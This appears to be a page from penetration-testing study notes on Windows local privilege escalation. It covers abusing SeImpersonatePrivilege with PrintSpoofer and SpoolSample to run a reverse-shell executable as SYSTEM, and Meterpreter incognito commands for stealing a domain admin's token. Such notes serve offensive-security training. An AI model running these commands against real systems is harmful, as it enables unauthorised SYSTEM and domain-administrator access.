Serivce Account Access Token

SeImpersonatePrivilege

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato - HackTricksbook.hacktricks.xyz

When no tokens related to other user accounts are available in memory, we can likely force the SYSTEM account to give us a token that we can impersonate. We can impersonate anyone who connects to our named pipe.

Default assigned:

built-in Network Service account
LocalService account
default IIS account

whoami /priv
cmd /c sc query spooler

GitHub - antonioCoco/RoguePotato: Another Windows Local Privilege Escalation from Service Account to SystemGitHub

OSEP-Code-Snippets/PrintSpoofer.NET at main · chvancooten/OSEP-Code-SnippetsGitHub

#hacked web ser locally create pipe & serve with rev shell.exe
.\PrintSpoofer.exe \\.\pipe\test\pipe\spoolss c:\temp\shell.exe

#callback to the loaclly created pipe triggering shell.exe call
.\SpoolSample.exe webself01 webself01/pipe/test

Meterpreter

impersonate any logged in users and obtain code execution in their context without access to any passwords or hashes (need SYSTEM shell, from above or below)

meterpreter >

getsystem

meterpreter >

load incognito
help incognito
list_tokens -u
impersonate_token corp1\\admin

getuid

PreviousLocal Administrator Password Solution (LAPS)NextMimikatz Abusing Kerberos

Last updated 1 year ago